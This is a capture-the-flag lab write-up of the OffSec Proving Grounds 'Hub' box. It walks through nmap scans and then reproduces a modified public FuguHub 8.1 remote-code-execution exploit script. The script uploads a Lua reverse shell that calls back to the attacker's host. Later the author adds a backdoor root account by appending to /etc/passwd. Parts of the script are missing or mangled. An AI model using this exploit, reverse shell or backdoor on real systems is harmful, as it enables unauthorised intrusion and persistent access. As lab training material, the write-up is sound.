Hub - OffSec Proving Grounds
I set up the VPN for OffSec and then started the machine to get an IP address. Once I got the IP, I ran an nmap scan for all ports to see what ports were open on the host.
nmap -p- 192.168.230.25 -o nmap.txt PORT STATE SERVICE 22/tcp open ssh 80/tcp open http 8082/tcp open blackice-alerts 9999/tcp open abyss
I then ran another nmap scan on just the ports that were open to find out what services were running on the open ports and version numbers.nmap -sV -sC -p 22,80,8082,9999 192.168.230.25
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)
| ssh-hostkey:
| 3072 c9c3da15283bf1f89a36df4d366ba744 (RSA)
| 256 26032bf6da901d1bec8d8f8d1e7e3d6b (ECDSA)
|_ 256 fb43b2b0192fd3f6bcaa6067abc1af37 (ED25519)
80/tcp open http nginx 1.18.0
|_http-title: 403 Forbidden
|_http-server-header: nginx/1.18.0
8082/tcp open http Barracuda Embedded Web Server
| http-webdav-scan:
| WebDAV type: Unknown
| Server Type: BarracudaServer.com (Posix)
| Allowed Methods: OPTIONS, GET, HEAD, PROPFIND, PATCH, POST, PUT, COPY, DELETE, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK
|_ Server Date: Sat, 23 Sep 2023 17:36:42 GMT
|_http-title: Home
| http-methods:
|_ Potentially risky methods: PROPFIND PATCH PUT COPY DELETE MOVE MKCOL PROPPATCH LOCK UNLOCK
|_http-server-header: BarracudaServer.com (Posix)
9999/tcp open ssl/http Barracuda Embedded Web Server
| http-methods:
|_ Potentially risky methods: PROPFIND PATCH PUT COPY DELETE MOVE MKCOL PROPPATCH LOCK UNLOCK
|_http-title: Home
| ssl-cert: Subject: commonName=FuguHub/stateOrProvinceName=California/countryName=US
| Subject Alternative Name: DNS:FuguHub, DNS:FuguHub.local, DNS:localhost
| Not valid before: 2019-07-16T19:15:09
|_Not valid after: 2074-04-18T19:15:09
|_http-server-header: BarracudaServer.com (Posix)
| http-webdav-scan:
| WebDAV type: Unknown
| Server Type: BarracudaServer.com (Posix)
| Allowed Methods: OPTIONS, GET, HEAD, PROPFIND, PATCH, POST, PUT, COPY, DELETE, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK
|_ Server Date: Sat, 23 Sep 2023 17:36:42 GMT
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernelI test out port 80 to see if I got the same result the nmap scan did, and was met with a 403 Forbidden message as well, so I moved onto the next port, 8082. Once The page loaded up, it automatically sent me to a Configuration page which told me to "Set Administrator Account"
I thought this was really interesting as the admin account hasn't been set up yet. I then googled "fuguhub server exploit" and came across an exploit for RCE with FuguHub 8.1.
I reviewed the code and noticed that it creates the admin account for me, and more importantly, switches to doing the export on an https port. This made me question the other port, 9999 to see if it was the same service just over https instead of http. I went to port 9999 in the web browser and was met with the same exact page. So I knew I needed to change the port numbers in the exploit code from port 443 to port 9999. I ran the code and it said that it couldn't find a file server. So I went back to review and noticed that in the code, it looks for a file server at the location of /fs/cmsdocs/. So I went to that location in the web browser over port 9999 and got a 404 error response. I went backward one directory up to /fs/ and there was a fileserver there with several files on it. So I edited the exploit code to remove the cmddocs directory when searching for the file server. I ran the exploit again and successfully caught a rev shell!
Exploit Title: FuguHub 8.1 - Remote Code Execution
# Date: 6/24/2023
# Exploit Author: redfire359
# Vendor Homepage: http://fuguhub.com/
# Software Link: http://fuguhub.com/download.lsp
# Version: 8.1
# Tested on: Ubuntu 22.04.1
# CVE : CVE-2023-24078
import requests
from bs4 import BeautifulSoup
import hashlib
from random import randint
from urllib3 import encode_multipart_formdata
from urllib3.exceptions import InsecureRequestWarning
import argparse
from colorama import Fore
requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)
#Options for user registration, if no user has been created yet
username = 'admin'
password = 'password'
email = 'admin@admin.com'
parser = argparse.ArgumentParser()
parser.add_argument("-r","--rhost", help = "Victims ip/url (omit the http://)", required = True)
parser.add_argument("-rp","--rport", help = "http port [Default 80]")
parser.add_argument("-l","--lhost", help = "Your IP", required = True)
parser.add_argument("-p","--lport", help = "Port you have your listener on", required = True)
args = parser.parse_args()
LHOST = args.lhost
LPORT = args.lport
url = args.rhost
if args.rport != None:
port = args.rport
else:
port = 80
def main():
checkAccount()
def checkAccount():
print(f"{Fore.YELLOW}[*]{Fore.WHITE} Checking for admin user...")
s = requests.Session()
# Go to the set admin page... if page contains "User database already saved" then there are already admin creds and we will try to login with the creds, otherwise we will manually create an account
r = s.get(f"http://{url}:{port}/Config-Wizard/wizard/SetAdmin.lsp")
soup = BeautifulSoup(r.content, 'html.parser')
search = soup.find('h1')
if r.status_code == 404:
print(Fore.RED + "[!]" + Fore.WHITE +" Page not found! Check the following: ntTaget IPntTarget Port")
exit(0)
userExists = False
userText = 'User database already saved'
for i in search:
if i.string == userText:
userExists = True
if userExists:
print(f"{Fore.GREEN}[+]{Fore.WHITE} An admin user does exist..")
login(r,s)
else:
print("{Fore.GREEN}[+]{Fore.WHITE} No admin user exists yet, creating account with {username}:{password}")
createUser(r,s)
login(r,s)
def createUser(r,s):
data = { email : email ,
'user' : username ,
'password' : password ,
'recoverpassword' : 'on' }
r = s.post(f"http://{url}:{port}/Config-Wizard/wizard/SetAdmin.lsp", data = data)
print(f"{Fore.GREEN}[+]{Fore.WHITE} User Created!")
def login(r,s):
print(f"{Fore.GREEN}[+]{Fore.WHITE} Logging in...")
data = {'ba_username' : username , 'ba_password' : password}
r = s.post(f"http://{url}:9999/rtl/protected/wfslinks.lsp", data = data, verify = False ) # switching to https cause its easier to script lolz
#Veryify login
login_Success_Title = 'Web-File-Server'
soup = BeautifulSoup(r.content, 'html.parser')
search = soup.find('title')
for i in search:
if i != login_Success_Title:
print(f"{Fore.RED}[!]{Fore.WHITE} Error! We got sent back to the login page...")
exit(0)
print(f"{Fore.GREEN}[+]{Fore.WHITE} Success! Finding a valid file server link...")
exploit(r,s)
def exploit(r,s):
#Find the file server, default is fs
r = s.get(f"http://{url}:9999/fs/")
code = r.status_code
if code == 404:
print(f"{Fore.RED}[!]{Fore.WHITE} File server not found. ")
exit(0)
print(f"{Fore.GREEN}[+]{Fore.WHITE} Code: {code}, found valid file server, uploading rev shell")
#Change the shell if you want to, when tested I've had the best luck with lua rev shell code so thats what I put as default
shell = f'local host, port = "{LHOST}", {LPORT} nlocal socket = require("socket")nlocal tcp = socket.tcp() nlocal io = require("io") tcp:connect(host, port); n while true do local cmd, status, partial = tcp:receive() local f = io.popen(cmd, "r") local s = f:read("*a") f:close() tcp:send(s) if status == "closed" then break end end tcp:close()'
files = {'file': ('rev.lsp', file_content, 'application/octet-stream')}
r = s.post(f"http://{url}:9999/fs/", files=files)
if r.text == 'ok' :
print(f"{Fore.GREEN}[+]{Fore.WHITE} Successfully uploaded, calling shell ")
r = s.get(f"http://{url}:9999/rev.lsp")
if __name__=='__main__':
try:
main()
except:
print(f"n{Fore.YELLOW}[*]{Fore.WHITE} Good bye!nn**All Hail w4rf4ther!")I had to leave out the "file_content" part, the text editor I'm using for this site did not like it as it was using html and php tags. I caught the reverse shell and found out I was root!
It was game over, or at least I thought it was! I tried moving directories and realized I couldn't. The shell would not let me leave the current directory which was /var/www/html. I technically cheated the next part as I was able to read the /root/proof.txt file to get the flag, but I wanted to be able to have a fully interactive root shell and it was bugging me. I actually gained a shell through two different methods. The first I created an msfvenom rev shell and uploaded it to the target machine using wget. Executed that shell and caught it on a listener and I was able to move around. But then thought about how ssh was open and I had access to the passwd file. So created a root user on the machine named "hacked2" with a password of test123.
echo "hacked2:$1$stef$ZYhbekI8UymZof5o8aY3A/:0:0:test:/root:/bin/bash" >> /etc/passwd
With this simple command, I was able to login via ssh as "hacked2" and have a root shell.
Either way worked, but I thought it would be fun to try multiple ways. I got the root flag and was good to go! It was a very easy box.
-Sam
